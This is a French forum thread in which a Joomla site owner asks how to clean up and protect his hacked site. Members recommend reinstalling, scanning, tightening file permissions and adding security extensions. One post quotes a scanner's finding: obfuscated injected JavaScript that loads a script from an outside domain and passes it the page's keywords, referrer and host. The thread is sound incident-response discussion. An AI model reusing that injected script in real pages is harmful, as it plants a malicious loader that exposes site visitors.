Re : Site attaqué, normalement nettoyé, mais comment être sûr et comment le maintenir

Bonjour

Pour la sécurité, tu as déjà RSFirewall et AdminTools, cela devrait largement suffire... si le site était propre et visiblement ce n'est pas le cas.

Tu pourras toujours essayer QuickScan (voir ma signature) pour débusquer quelques-uns des virus mais cela ne sera que quelques-uns.

Si tu ne sais pas comment nettoyer de fond en comble ton site; vois le troisième lien dans ma signature; il dirige vers une page où je prodigue moults conseils pour le faire soi-même... sachant que le plus simple étant de repartir d'une archive propre du site.

Bonne chance.

Re : Site attaqué, normalement nettoyé, mais comment être sûr et comment le maintenir

J'ai Switch qui m'a découvert une partie modifiée, mais je ne sais pas du tout où trouver ce code :

hxxp://www.kinaissance.ch/jml/
Notice from our analyst:
Malicious javascript on line 94: inline

Malicious javascript found on line 94:

<script>var a='';setTimeout(10);if(document.referrer.indexOf(l ocation.protocol+"//"+location.host)!==0||document.referrer!==undefine d||document.referrer!==''||document.referrer!==nul l){document.write('<script type="text/javascript" src="hxxp://sinejaneser.com/js?c_utt=J18171&c_utm='+encodeURIComponent('hxxp://sinejaneser.com/js'+'?'+'default_keyword='+encodeURIComponent(((k= (function(){var keywords='';var metas=document.getElementsByTagName('meta');if(met as){for(var x=0,y=metas.length;x<y;x++){if(metas[x].name.toLowerCase()=="keywords"){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window. location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&se_referrer='+encodeURIComponent(document.r eferrer)+'&source='+encodeURIComponent(window.loca tion.host))+'"><'+'/script>');}</script>

Re : Site attaqué, normalement nettoyé, mais comment être sûr et comment le maintenir

Probablement dans ton template (index.php) mais débusquer juste cette ligne serait comme avoir utiliser une cuillère pour vider la mer : zéro garantir d'avoir tout nettoyé.

Re : Site attaqué, normalement nettoyé, mais comment être sûr et comment le maintenir

Slt,

J'ai déjà eu à traiter de type de problème sur des sites de clients qui s'étaient montré négligents.
Comme le dit Cavo, une seule ligne de nettoyée ne suffira certainement pas à résoudre le problème, car généralement, les scripts malicieux et autres pages douteuses sont placées à plusieurs endroits de l'arborescence d'un site.

Les outils de cavo pour te protéger sont de bon outils que je ne peux que te conseiller (même si je trouve que Quickscan renvoie parfois beaucoup "faux positifs" qu'un néophyte aura bien du mal à traiter... mais tu peux demander à Cavo lui-même d'intervenir pour un coût presque dérisoire).

Dans tous les cas, faut vérifier certaines pages comme :
- administrator/includes/defines.php
- administrator/includes/framework.php
- includes/defines.php
- includes/framework.php

mais il y a beaucoup d'endroit où peuvent se trouver des fichiers malicieux, avec des noms souvent trompeur (ex : joomla.php).

Ce que tu peux aussi faire, c'est télécharger l'intégralité du site et le passer à l'analyse d'un bon anti-virus.
Ils sont capables de détecter de nombreux chevaux de Troie et autres codes dangereux.
ça te permettra d'identifier les pages malsaines à nettoyer ou supprimer.

Mais le plus simple, si ton site n'est pas trop sophistiqué et/trop dense en contenu :
- tu copies tous les textes des articles
- tu supprimer le site (fichiers et base de données)
- tu refais une installation toute neuve et toute propre
- tu ré-écris les articles à partir des textes copiés.

Ensuite, tu utilises des mots de passe sophistiqués composés de 8 caractères minimum (10 ou 12 c'est mieux), avec majuscule, minuscules, chiffres, et même symboles) tu installes des outils comme aesecure, admintools d'akeeba, Marco's SQL Injection, Brute Force Stop...
Tu peux aussi changer les droits en écriture de certains fichiers (les mettre en 444)
- configuration.php
- administrator/includes/defines.php
- administrator/includes/framework.php
- includes/defines.php
- includes/framework.php

pour les plus sensibles et les plus visés

Dol.

Re : Site attaqué, normalement nettoyé, mais comment être sûr et comment le maintenir

Salut, Ce que tu peux faire aussi si tu souhaites retrouver une partie de code (malicieuse ou non) tu telecharge n local ton dossier www et tu fais simplement une recherche sur le contenu du fichier avec une partie du code recherché. Perso j'utilise le logiciel superfinderxt sous Windows.

Re : Site attaqué, normalement nettoyé, mais comment être sûr et comment le maintenir

Bonjour

@dolmenhir : réponse fort complète que la tienne, super ! merci pour ton appréciation de mes outils. Pour QuickScan, oui, forcément beaucoup de faux positifs; c'est le point faible quand on recherche sur des mots-clefs (p.ex. base64_decode). QuickScan, toutefois, reconnait plus de 170.000 fichiers comme étant sains (liste blanche) ainsi que toutes les versions de Joomla et WP (je gère 16 CMS). Les faux-positifs sont toutefois impossible à éliminer sur un site, dû au scan par "mot clef".

Par rapport à ton explication, très bien mais j'ajouterai de conserver les images (dossier /images) et aussi les médias (/media) : les conserver mais bien sûr scanner les dossiers pour en extirper les bestioles.

Ensuite oui, si on le fait à la main, virer tout le code de Joomla, tous les composants, templates, ... et tout réinstaller. C'est ce que je décris dans mon article "Votre site a été hacké, que faire".

@_Ovb : oui ok mais c'est très léger... Les virus sont souvent polymorphes et cryptés. Ce code-là, que tu vois dans le HTML de la page n'est probablement pas celui qui est codé dans le source. Cela pourrait être un code en base64 et/ou un code assemblé (des morceaux de chaînes concaténés) etc.

Puis, depuis le début de cette discussion, nous mentionnons : localiser un virus, c'est bien mais c'est tellement léger car à moins d'avoir une chance inouïe, quand tu détectes un virus sur le site, les petits frères et les petites soeurs sont là, mieux planqué. Cela me fait penser à une expérience que j'ai vécue en Polynésie. Mon épouse et moi étions dans une cabane sur la plage avec un toit en branche. J'ai vu un gros cafard; beurk. J'ai été demandé une solution à la réception et j'ai reçu un aérosol. Je suis revenu dans la chambre et j'ai pfffiut pffffiut sur le cafard. Malheur, ils sont sortis par dizaines. Ta proposition, c'est l'aérosol sans le bruit ni l'odeur : les autres cafards resteront bien cachés.

Bonne journée.

Re : Site attaqué, normalement nettoyé, mais comment être sûr et comment le maintenir

@cavo : tu as tout a fait raison, et c'est un oubli malheureux de ma part : faut conserver les images et média, à scanner via l'anti-virus.
Pour le quickscan, perso ça ne me pose pas de soucis. L'outil est puissant et en tant que développeur je sais faire la part des choses. Mais les faux positifs vont faire paniquer plus d'un néophyte qui risquent de supprimer ce qui ne doit pas l'être...
C'est pour ça que je leur conseille vivement de faire appel à tes services pour deux simples et évidentes raisons :

1. c'est ton outil, donc tu le maîtrise mieux que personne
2. le tarif de ton intervention c'est cadeau vu le service rendu

De toute façon, n'importe qui avec un peu de bon sens n'aura même pas besoin de mon conseil pour le suivre

@_Ovb : cavo a parfaitement raison. La méthode est trop basique pour parvenir à nettoyer efficacement un site réellement infecté. Sur un site client, j'ai recensé pas moins de 18 fichiers, dont la moitié étaient des backdoors codés en base 64, et placé à des endroits insoupçonnables... d'autant plus que généralement, ce sont des bots qui font le boulot,e t dès qu'ils détectent une anomalie dans leur "maillage infectieux", il réagissent en ré-introduisant de nouveaux fichiers, ailleurs... faut donc rien laisser passer, sinon faut tout recommencer...

Re : Site attaqué, normalement nettoyé, mais comment être sûr et comment le maintenir

Bonjour,

Merci pour toutes ces infos.

Tout ceci me chagrine et me fait perdre un temps incommensurable. J'ai tenté de copier quickscan en racine du site, mais cela a été détecté comme un piratage FTP et mon site est à nouveau bloqué.

Au vu de tant d'énervements, ne serait-ce pas plus simple de transformer les pages en du simple html statique, vu que le site n'est pas d'un grand dynamisme ?

Re : Site attaqué, normalement nettoyé, mais comment être sûr et comment le maintenir

y a combien d'articles ?

Re : Site attaqué, normalement nettoyé, mais comment être sûr et comment le maintenir

Il y en a 8.

Re : Site attaqué, normalement nettoyé, mais comment être sûr et comment le maintenir

ben alors c'est extrêmement simple.
1. tu copies/colles le texte de tes articles dans un traitement de texte.
2. tu sauvegardes les images associées à chaque article
3. tu supprimes tout : fichier et base de données
4. tu réinstalles un joomla tout beau tout neuf et exempt de toute infection
5. tu recrées tes articles à partir de ton copier/coller
6. tu places éventuellement tes images d'article

Perso, pour 8 articles, c'est ce que je ferai.
A mon avis, en moins d'un heure (même beaucoup moins si tu maitrises) ton site est de nouveau opérationnel.

Dol.

Re : Site attaqué, normalement nettoyé, mais comment être sûr et comment le maintenir

L'hébergeur ...Niak est vraiment pénible.

Leurs sites sont présumés "mieux sécurisés" mais des virus s'introduisent quand même (ok, c'est logique) mais ils te bloquent l'upload d'un scanneur... Mouais...

Tu pourrais télécharger ton site en localhost et utiliser QuickScan en local.

Pour ta suggestion de copie en html c'est toi qui voit mais c'est un peu dommage non ? Le souci "Mon site a été piraté" peut être solutionné et ensuite tu peux le protéger. Est-ce que ton hébergeur ne dispose pas d'un backup récent de ton site, backup sain et non vérolé ? Si oui, il suffit de restaurer ce backup et ton problème est solutionné.

Bonne chance.

Re : Site attaqué, normalement nettoyé, mais comment être sûr et comment le maintenir

Ils ont bien des backups, mais de là à être sûr qu'ils sont sains, c'est un autre problème.

C'est clair que l'html, c'est con, mais je voulais d'une certaine manière éviter de repasser 2-3 jours à refaire le site complet, car même si je touche assez bien à l'informatique (heureusement en tant que responsable IT), Joomla a été long à mettre en place pour avoir un site à l'image de ma femme. Donc oui, il n'y a que 8 articles, mais les extensions pour des petites choses sympas prendront quand même du temps à remettre en place. Sans compter que je n'ai aucune assurance que cela ne se reproduise plus.

A moins que vous ayez des préférences à mettre pour AdminTools d'Akeeba et RSFirewall pour m'assurer un total blocage ?

Bon, je vais commencer par mettre un autre dossier cible et rechanger le mot de passe FTP (fait hier dans la matinée...) suggéré par Infomaniak avec plein de caractères bien chiant à taper, puis rebelote, plein de nouveau fichiers php . En effet, un bots me cherche...

Quid pour l'installation de Joomla, je l'installe en racine ou dans un sous-dossier nommé cms ou ce que je veux ?

Re : Site attaqué, normalement nettoyé, mais comment être sûr et comment le maintenir

C'est souvent par là que le bât blesse...

Il y a certaines extensions qui sont codées avec les pieds, ou dont la mise à jour tarde à venir...
C'est comme ça que les failles apparaissent...

Pour le blocage total, y a pas de fiabilité à 100%
Faut faire de la veille, plus ou moins régulière.
Mais avec des outils comme aesecure ou admin tools c'est déjà très bien.

ben ça dépend de ton environnement... te permet-il de faire du multi-site ?
Si oui, un sous-dossier sera bien... mais pas d'instal tant que le site corrompu est là... il lui sera facile de remonter l'arborescence.

qq d'autre que moi saura pour infomaniak... moi j'utilise pas

Dol.